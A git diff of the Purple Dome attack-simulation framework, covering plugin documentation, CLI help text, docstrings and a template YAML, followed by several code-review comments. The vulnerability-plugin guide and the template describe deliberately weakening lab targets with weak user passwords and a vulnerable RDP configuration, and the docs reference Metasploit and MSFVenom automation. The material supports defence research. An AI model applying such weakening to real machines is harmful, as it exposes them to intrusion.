@@ -26,8 +25,6 @@ After that it can be used under this name in a Vagrantfile. Setting up Windows for Purple Dome ---------------------------------- -* Mount the vagrant share to X: (at least my scripts expect it) *net use x:\\vboxsvr\share* -* Create a batch file in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup to automatically start *caldera_agent.bat* in the vagrant share for this machine. This ensures that the caldera agent can be started in reboot * Install OpenSSH on the windows target (https://docs.microsoft.com/de-de/windows-server/administration/openssh/openssh_install_firstuse and https://docs.microsoft.com/de-de/windows-server/administration/openssh/openssh_keymanagement) Some SSH hints (powershell): @@ -74,12 +71,12 @@ To connect from linux call bash:: (Capital letters for user name !) * The parameters enforce the use of a specific key. You can also drop that into the ssh config -Footnote: WinRM failed. I tried. The python code does not support ssh-style "disown". Vagrant files needed a special configuration-and sometimes failed connecting to the windows host properly. Base problem was that it does not properly support empty passwords (not on python, anyway) - and I used them for auto-login. Because some windows versions are a bit tricky with auto-login settings as they should be. Windows 10 is mutating here like hell. +Footnote: WinRM failed. SCP from and to Windows ----------------------- -Just use the user's home folder as entry and do:: +Just use the user's home folder as "entry folder" and do:: scp win10:my_logs.zip . diff --git a/doc/source/extending/attack_plugins.rst b/doc/source/extending/attack_plugins.rst index 6478792..4a4d90c 100644 --- a/doc/source/extending/attack_plugins.rst +++ b/doc/source/extending/attack_plugins.rst 
@@ -9,9 +9,9 @@ An example plugin is in the file *hydra_plugin.py*. It contains a plugin class t :: - Important: We want to improve defense in this project. Adding any attack must be done with this goal. To guarantee that: + Important: This projects goal is to improve defense. Adding any attack must be done with this goal. To guarantee that: - * Only add attacks that are already ITW + * Only add attacks that are already in the wild * Link to blog posts describing this attack * Maybe already drop some ideas how to detect and block * Or even add code to detect and block it @@ -19,7 +19,7 @@ An example plugin is in the file *hydra_plugin.py*. It contains a plugin class t Usage ===== -To create a new plugin, start a sub-folder in plugins. The python file in there must contain a class that inherits from *AttackPlugin*. +To create a new plugin, start a sub-folder in *plugins*. The python file in there must contain a class that inherits from *AttackPlugin*. There is an example plugin *hydra.py* that you can use as template. 
@@ -33,31 +33,17 @@ The boilerplate contains some basics: * ttp: The TTP number of this kali attack. See https://attack.mitre.org/ * references. A list of urls to blog posts or similar describing the attack * required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init. +Better than using required_files is to use: +* required_files_attacker: required files to send to the attacker +* required_files_target: required files to send to the target -Method: process_config ----------------------- - -This class processes the plugin specific configuration. The *config* parameter will contain the plugin specific part of the yaml config file. You job will be to parse it, offer sane defaults and store the parsed config in *self.conf[]*. - -Method: command ---------------- - -Creates a command that can be run on the kali machine as command. Parameters and configs you can use: - -* targets: a list of ip addresses of potential targets -* config: special config for this call -* self.sysconf: global plugin configuration. Like the path to the kali share (internal or external) -* self.conf: The configuration you created in the *process_config* method Method: run ----------- -This will run the command line created by the method *command* on the kali attacker. - -Configuration -------------- +This will run the attack. -If you are using the plugin, you **must** have a config section for this kali plugin in the configuration. Even if it is empty. +* targets: a list of target machines. If you need the network address, use target[0].get_ip() The plugin class ================ diff --git a/doc/source/extending/documentation.rst b/doc/source/extending/documentation.rst index 96a276a..74cd717 100644 --- a/doc/source/extending/documentation.rst +++ b/doc/source/extending/documentation.rst 
@@ -2,7 +2,7 @@ Extending the documentation =========================== -Tools being used are: +Tools being used for documentation are: * Argparse for my command line tools @@ -19,4 +19,8 @@ Tools being used are: * Autoyaml - - https://github.com/Jakski/sphinxcontrib-autoyaml \ No newline at end of file + - https://github.com/Jakski/sphinxcontrib-autoyaml + +* Asciinema + + - https://pypi.org/project/sphinxcontrib.asciinema/ \ No newline at end of file diff --git a/doc/source/extending/extending.rst b/doc/source/extending/extending.rst index 8bc7182..73cbec2 100644 --- a/doc/source/extending/extending.rst +++ b/doc/source/extending/extending.rst @@ -8,13 +8,13 @@ Modules Several core module create the system. * CalderaControl: remote control for Caldera using the Caldera REST API +* Metasploit: Metasploit control * MachineControl: Create/start and stop VMs * ExperimentControl: Control experiments. Will internally use the modules already mentioned +* PluginManager: Plugin manager tasks +* MachineConfig / ExperimentConfig: Reading and processing configuration files +* AttackLog: Logging attack steps and output to stdio -.. sidebar:: Plugins - - There will be a plugin system soon. Until then the only way to extend - PurpleDome is to modify the core source code. If it is not urgent, maybe better be patient and ask for a specific plugin interface. -------------- CalderaControl @@ -25,6 +25,24 @@ Class for Caldera communication .. autoclass:: app.calderacontrol.CalderaControl :members: +---------- +MetaSploit +---------- + +Class for Metasploit automation + +.. autoclass:: app.metasploit.Metasploit + :members: + +-------- +MSFVenom +-------- + +Class for MSFVenom automation + +.. autoclass:: app.metasploit.MSFVenom + :members: + -------------- MachineControl -------------- 
@@ -54,3 +72,21 @@ Internal configuration handling. Currently there are two classes. One for the wh .. autoclass:: app.config.MachineConfig :members: + +------------- +PluginManager +------------- + +Managing plugins + +.. autoclass:: app.pluginmanager.PluginManager + :members: + +--------- +AttackLog +--------- + +Attack specific logging + +.. autoclass:: app.attack_log.AttackLog + :members: \ No newline at end of file diff --git a/doc/source/extending/sensor_plugins.rst b/doc/source/extending/sensor_plugins.rst index 76b7a62..ec26efd 100644 --- a/doc/source/extending/sensor_plugins.rst +++ b/doc/source/extending/sensor_plugins.rst @@ -9,19 +9,13 @@ Usage To create a new plugin, start a sub-folder in plugins. The python file in there must contain a class that inherits from *SensorPlugin*. -If the plugin is activated for a specific machine four specific methods will be called to interact with the target: +If the plugin is activated for a specific machine specific methods will be called to interact with the target: -* Install -* Start -* Stop -* Collect results - -Methods for these four are called by PurpleDome. Normally you should not have to edit these methods. Just the commands you that are called by them. And those commands are created by specific methods: - -* install_command -* start_command -* stop_command -* collect_command +* prime: Easrly installation steps, can trigger a reboot of the machine by returning True +* install: Normal, simple installation. No reboot +* start: Start the sensor +* stop: Stop the sensor +* collect: Collect results Boilerplate ----------- diff --git a/doc/source/extending/vm_controller_plugins.rst b/doc/source/extending/vm_controller_plugins.rst index aa569be..237e98b 100644 --- a/doc/source/extending/vm_controller_plugins.rst +++ b/doc/source/extending/vm_controller_plugins.rst 
@@ -8,8 +8,11 @@ A VM plugin handles several things: * vm creation/destruction * vm starting/stopping -* connecting to the VM (ssh or similar) and running commands there -* Copy files from and to the VM + +VM controller plugins can use SSH as a mixin class. This is implemented in *ssh_features.py* and reduces code duplication. In certain cases (for example if SSH needs some extra features) you can extend or replace methods from there. SSH handles: + +* connecting to the VM and running commands there +* Copying files from and to the VM 
@@ -29,68 +32,28 @@ The boilerplate contains some basics: * description. A human readable description for this plugin. * required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init. -Method: process_config ----------------------- - -The configuration for this machine is a sub-section in the experiment config. As the different machinery systems might require special handling, you can parse the config in this section and add your own processing or defaults +Some relevant methods are -Method: create +process_config -------------- -Creates the machine (for systems like vagrant that build a machine out of a config file) - -Method: up ----------- - -Starts the machine - -Method: halt ------------- - -Stops the machine - -Method: destroy ---------------- - -Remove the machine from disk. Only smart if you can re-create it with *create* - -Method: connect ---------------- - -Create a connection to this machine to run shell commands or copy files - -Method: remote_run ------------------- - -Execute a command on the running machine - -Method: put ------------ - -Copy a file to the machine - -Method: get ------------ - -Get a file from the machine - -Method: disconnect ------------------- - -Disconnect the command channel from the vm +The configuration for this machine is a sub-section in the experiment config. As the different machinery systems might require special handling, you can parse the config in this section and add your own processing or defaults -Method: get_state ------------------ +get_state +--------- Get the machines state. The class MachineStates contains potential return values -Method: get_ip --------------- +get_ip +------ Get the ip of the machine. If the machine is registered at the system resolver (/etc/hosts, dns, ...) a machine name would also be a valid response. As long as the network layer can reach it, everything is fine. 
The plugin class ================ +The machine class can also be very essential if you write attack plugins. Those have access to the kali attack and one or more targets. And those are Machinery objects. +For a full list of methods read on: + .. autoclass:: plugins.base.machinery.MachineryPlugin :members: \ No newline at end of file diff --git a/doc/source/extending/vulnerability_plugins.rst b/doc/source/extending/vulnerability_plugins.rst index 960a6d6..441a52b 100644 --- a/doc/source/extending/vulnerability_plugins.rst +++ b/doc/source/extending/vulnerability_plugins.rst @@ -2,9 +2,9 @@ Vulnerability plugins ********************* -To leave attack traces on a machine it should be vulnerable. Services should run. Old application be installed, users with weak passwords added. The configuration should be a mess. +To leave attack traces on a machine it should be vulnerable. Services should run. Old application be installed, users with weak passwords added to the system. You get the idea. -This plugin type allows you to punch some holes into the protection of a machine. Which plugins are loaded for a specific target is defined in the configuration file. +This plugin type allows you to punch some holes into the protection of a machine. Which vulnerability plugins are loaded for a specific target is defined in the configuration file. Feel free to weaken the defenses. Usage ===== 
@@ -20,25 +20,25 @@ The boilerplate contains some basics: * name: a unique name, also used in the config yaml file to reference this plugin * description: A human readable description for this plugin. -* ttp: The TTP number of this kali attack. See https://attack.mitre.org/ Just as a hint which TTP this vulnerability could be realted to -* references. A list of urls to blog posts or similar describing the attack +* ttp: The TTP number of this kali attack. See https://attack.mitre.org/ Just as a hint which TTP this vulnerability could be related to +* references: A list of urls to blog posts or similar describing the attack * required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init. +Method: install (optional) +-------------------------- + +*start* installs the vulnerability on the target. *install* is called before that. If you have to setup anything in the plugin space (and not on the target) do it here. + Method: start ------------- -Put the code in here that adds vulnerabilities to the machine. The most important method you can use here is "self.run_cmd" and execute a shell command. +Adds the vulnerability to the machine. The most important method you can use here is "self.run_cmd" and execute a shell command. Method: stop ------------ Undo the changes after the attacks ran. If the machine is re-used (and not re-built or run from a snapshot) this will make it simpler for the user to run more experiments on slightly modified systems. -Method: install (optional) --------------------------- - -*start* installs the vulnerability on the target. *install* is called before that. If you have to setup anything in the plugin space (and not on the target) do it here. - The plugin class ================ diff --git a/doc/source/index.rst b/doc/source/index.rst index abc87fb..be0bcc8 100644 --- a/doc/source/index.rst +++ b/doc/source/index.rst 
@@ -17,14 +17,12 @@ Welcome to the Purple Dome documentation! basics/background + usage/cli + basics/configuration basics/windows_targets - usage/usage - - usage/cli - extending/vulnerability_plugins extending/attack_plugins diff --git a/doc/source/usage/cli.rst b/doc/source/usage/cli.rst index 832e205..407de01 100644 --- a/doc/source/usage/cli.rst +++ b/doc/source/usage/cli.rst @@ -19,22 +19,33 @@ Experiment control is the core tool to run an experiment. It accepts a yaml conf :func: create_parser :prog: ./experiment_control.py -Machine control -=============== +Plugin manager +============== -Directly control the machines +List available plugins or a specific plugin config .. argparse:: - :filename: ../machine_control.py + :filename: ../plugin_manager.py :func: create_parser - :prog: ./machine_control.py + :prog: ./plugin_manager.py Caldera control =============== -Directly control a caldera server +Directly control a caldera server. You will need a running caldera server to connect to. This plugin is handy to list available attacks and find the attack IDs matching specific TTP-IDs. .. argparse:: :filename: ../caldera_control.py :func: create_parser - :prog: ./caldera_control.py \ No newline at end of file + :prog: ./caldera_control.py + +Machine control +=============== + +Directly control the machines + +.. argparse:: + :filename: ../machine_control.py + :func: create_parser + :prog: ./machine_control.py + diff --git a/experiment_control.py b/experiment_control.py index f4779a4..51c27ca 100644 --- a/experiment_control.py +++ b/experiment_control.py 
@@ -46,9 +46,9 @@ def create_parser(): # Sub parser for machine creation parser_run = subparsers.add_parser("run", help="run experiments") parser_run.set_defaults(func=run) - parser_run.add_argument("--configfile", default="experiment.yaml", help="Config file to create from") - parser_run.add_argument("--caldera_attack", default=None, help="The id of a specific caldera attack to run") - parser_run.add_argument("--caldera_attack_file", default=None, help="The file name containing a list of caldera attacks to run") + parser_run.add_argument("--configfile", default="experiment.yaml", help="Config file to create the experiment from") + parser_run.add_argument("--caldera_attack", default=None, help="The id of a specific caldera attack to run, will override experiment configuration for attacks") + parser_run.add_argument("--caldera_attack_file", default=None, help="The file name containing a list of caldera attacks to run, will override experiment configuration for attacks") return parser diff --git a/plugins/base/machinery.py b/plugins/base/machinery.py index 060ab25..5252e84 100644 --- a/plugins/base/machinery.py +++ b/plugins/base/machinery.py @@ -105,12 +105,12 @@ class MachineryPlugin(BasePlugin): raise NotImplementedError def get_playground(self): - """ path where all the attack tools will be copied to on a client. Your specific machine plugin can overwrite it. """ + """ Path on the machine where all the attack tools will be copied to. """ return self.config.get_playground() def get_vm_name(self): - """ Get the name of the machine """ + """ Get the specific name of the machine """ return self.config.vmname() @@ -122,7 +122,7 @@ class MachineryPlugin(BasePlugin): raise NotImplementedError def get_machine_path_external(self): - """ The path external to the vm where specific data is stored """ + """ The path on the controlling host where vm specific data is stored """ return os.path.join(self.config.vagrantfilepath(), self.config.machinepath()) ############### 
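Review bot: The new help strings for `--caldera_attack` and `--caldera_attack_file` each say they override the experiment configuration, but nothing in the hunk makes the two options mutually exclusive, so a caller passing both gets an undocumented precedence. Either register them on `group = parser_run.add_mutually_exclusive_group()` (using `group.add_argument(...)` for those two lines) or state in each help text which one wins when both are given. The context comment `# Sub parser for machine creation` above `parser_run` is stale for the `run` sub-parser and could read `# Sub parser for running experiments`. create_parser starts outside the hunk, so whether precedence is resolved later in `run()` cannot be seen here.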
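Review bot: The rewritten docstring for `get_playground` drops the statement that a machine plugin may overwrite it, which was the only hint to plugin authors that the base implementation is a default rather than the sole source of the path; consider keeping it, e.g. `""" Path on the machine where all the attack tools will be copied to. Specific machine plugins may override this. """`. In the same hunk `""" Get the specific name of the machine """` is vaguer than the line it replaces; since the body returns `self.config.vmname()`, `""" Get the VM name of the machine as read from its configuration """` says what it actually does. Both methods are complete inside the hunk; the enclosing class starts outside it.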
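Review bot: The new docstring for `get_machine_path_external` presents the result as living under the controlling host's data directory, but `os.path.join(self.config.vagrantfilepath(), self.config.machinepath())` discards `vagrantfilepath()` entirely when `machinepath()` is absolute, so a config value such as `/tmp/x` (example) silently lands outside the expected location. A one-line guard before the return, `if os.path.isabs(self.config.machinepath()): raise ValueError("machinepath must be relative to vagrantfilepath")`, would pin the intended confinement; at minimum the docstring should add `machinepath must be relative; an absolute value replaces vagrantfilepath.` The method is complete inside the hunk; the enclosing class starts outside it.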
diff --git a/template.yaml b/template.yaml index 2ab41e0..f9237cf 100644 --- a/template.yaml +++ b/template.yaml @@ -89,14 +89,17 @@ targets: vm_name: target2 os: windows paw: target2w + ### # Targets need to be in a group for caldera. The group is more relevant than the paw. Better put every target in a unique group - group: red + group: red_windows machinepath: target2w + ### # Do not destroy/create the machine: Set this to "yes". use_existing_machine: yes + ### # Optional setting to activate force when halting the machine. Windows guests sometime get stuck halt_needs_force: yes @@ -118,10 +121,13 @@ targets: # Windows can only use default playground at the moment ! # playground: C:\\Users\\PurpleDome + ### # Sensors to run on this machine sensors: - windows_idp + ### + # Vulnerabilities to pre-install vulnerabilities: - weak_user_passwords - rdp_config_vul